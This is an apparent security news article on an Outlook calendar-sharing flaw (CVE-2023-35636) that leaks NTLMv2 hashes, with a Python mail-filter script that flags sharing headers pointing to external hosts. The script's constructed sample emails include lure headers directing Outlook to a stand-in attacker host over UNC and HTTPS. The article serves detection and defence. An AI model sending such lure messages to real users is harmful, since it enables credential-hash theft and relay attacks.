NTLM Hashes: Attackers Steal Password Hashes in Link Attack

A vulnerability in Microsoft Outlook that let attackers obtain NT LAN Manager (NTLM) v2 password hashes has been patched, according to a recent report. Attackers could trigger it with a specially crafted file and capture the hash Outlook sent while trying to authenticate. NTLMv2 is still widely used for user authentication to remote servers, which makes the captured hashes (strictly, the NTLMv2 challenge responses, commonly called NTLM hashes) a valuable target: they can be relayed to other services or cracked offline.

The flaw, tracked as CVE-2023-35636 (CVSS 6.5), was fixed by Microsoft in its December 2023 Patch Tuesday update. Microsoft's advisory describes two attack scenarios:

  • In an email attack scenario, an attacker sends the specially crafted file to the user and convinces them to open it.
  • In a web-based attack scenario, an attacker hosts the specially crafted file on a website they control, or on a compromised website that accepts user-provided content.

In both cases the attacker cannot force the victim to open anything; the victim must be persuaded to follow a link in a phishing email or message and open the corresponding file.

CVE-2023-35636 lies in Outlook's calendar-sharing feature. A malicious email is crafted with two headers: "Content-Class: Sharing", which tells Outlook that the message carries shared-calendar content, and "x-sharing-config-url", which points Outlook at an attacker-controlled server for the sharing configuration (.ics) file. When the victim opens the shared calendar from the email, Outlook connects to that server to fetch the file and authenticates with NTLMv2, handing the attacker the hash.
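The header pair above is what a mail-filtering or SOC check would look for. The following is an added example written for this article, not code from Microsoft or Varonis: it parses raw messages, pulls the host out of the "x-sharing-config-url" value (which may be a UNC path or an http/https URL), and flags messages whose sharing configuration would make Outlook authenticate to a host outside the organisation. The trusted-host list and the sample messages are constructed for the example; the attacker hostname, addresses and file names are placeholders.

```python
import ipaddress
import re
from email import message_from_string
from typing import Optional
from urllib.parse import urlparse

# Hosts Outlook may legitimately pull a sharing configuration from.
# Constructed for this example; a real deployment lists its own Exchange
# or SharePoint names here.
TRUSTED_HOSTS = {"mail.corp.example", "sharing.corp.example"}

# \\host\share\file.ics  ->  captures "host"
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def extract_host(target: str) -> Optional[str]:
    """Return the host part of a sharing URL, handling UNC paths as well as
    http/https/file URLs. Returns None when no host can be found."""
    target = target.strip()
    m = UNC_RE.match(target)
    if m:
        return m.group(1).lower()
    parsed = urlparse(target)
    if parsed.hostname:
        return parsed.hostname.lower()
    return None


def is_internal(host: str) -> bool:
    """True for explicitly trusted names or private/loopback addresses.
    Note: ipaddress.is_private also covers documentation ranges such as
    203.0.113.0/24, which is why the attacker side of the samples below
    uses a hostname rather than a TEST-NET address."""
    if host in TRUSTED_HOSTS:
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return addr.is_private or addr.is_loopback


def classify_message(raw: str) -> dict:
    """Flag a message whose calendar-sharing headers would send Outlook to an
    external host. Outlook authenticates with NTLMv2 to whatever host serves
    the sharing configuration, so an external host means a leaked hash."""
    msg = message_from_string(raw)  # header lookups below are case-insensitive
    content_class = (msg.get("Content-Class") or "").strip().lower()
    target = (msg.get("x-sharing-config-url") or "").strip()
    host = extract_host(target) if target else None
    verdict = {
        "sharing": content_class == "sharing",
        "target": target,
        "host": host,
        "suspicious": False,
        "reason": "",
    }
    if not target:
        return verdict
    if host is None:
        verdict["suspicious"] = True
        verdict["reason"] = "sharing config URL with unparseable host"
    elif not is_internal(host):
        verdict["suspicious"] = True
        verdict["reason"] = f"sharing config URL points to external host {host}"
    return verdict


# Constructed sample messages, not captured traffic. Hosts are placeholders.
LURE_UNC = (
    "From: sender@example.net\n"
    "To: victim@corp.example\n"
    "Subject: Shared calendar\n"
    "Content-Class: Sharing\n"
    "x-sharing-config-url: \\\\attacker.example.net\\share\\calendar.ics\n"
    "\n"
    "Open this iCal to view the shared calendar.\n"
)
LURE_HTTP = (
    "From: sender@example.net\n"
    "To: victim@corp.example\n"
    "Subject: Shared calendar\n"
    "Content-Class: Sharing\n"
    "x-sharing-config-url: https://attacker.example.net/cal.ics\n"
    "\n"
    "Open this iCal to view the shared calendar.\n"
)
BENIGN = (
    "From: colleague@corp.example\n"
    "To: victim@corp.example\n"
    "Subject: Team calendar\n"
    "Content-Class: Sharing\n"
    "x-sharing-config-url: \\\\10.0.0.5\\calendars\\team.ics\n"
    "\n"
    "Open this iCal to view the team calendar.\n"
)

if __name__ == "__main__":
    for name, raw in [("LURE_UNC", LURE_UNC), ("LURE_HTTP", LURE_HTTP), ("BENIGN", BENIGN)]:
        v = classify_message(raw)
        print(f"{name}: suspicious={v['suspicious']} host={v['host']} {v['reason']}")
```

The check deliberately keys on the destination host rather than on the presence of the headers alone, because legitimate calendar sharing inside an organisation produces the same two headers; what distinguishes the lure is that the configuration file lives on a host the victim's Outlook should never authenticate to.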

Security researcher Dolev Taler of Varonis, who reported the Outlook flaw, also found that NTLM hashes can leak through Windows Performance Analyzer (WPA) and Windows File Explorer. Microsoft has not yet patched these two vectors. Taler noted that WPA attempts to authenticate using NTLMv2 over the open web, whereas NTLMv2 is normally meant for authenticating to internal, IP-address-based services. Once an NTLMv2 response travels over the open internet, it is exposed to relay attacks and offline cracking.

This incident is a reminder for individuals and organisations to keep software updated and to treat unexpected calendar invitations, links and files with caution. For organisations it also underlines the value of blocking outbound NTLM authentication to the internet where possible and of monitoring continuously, so that vulnerabilities like this one are detected and mitigated promptly.
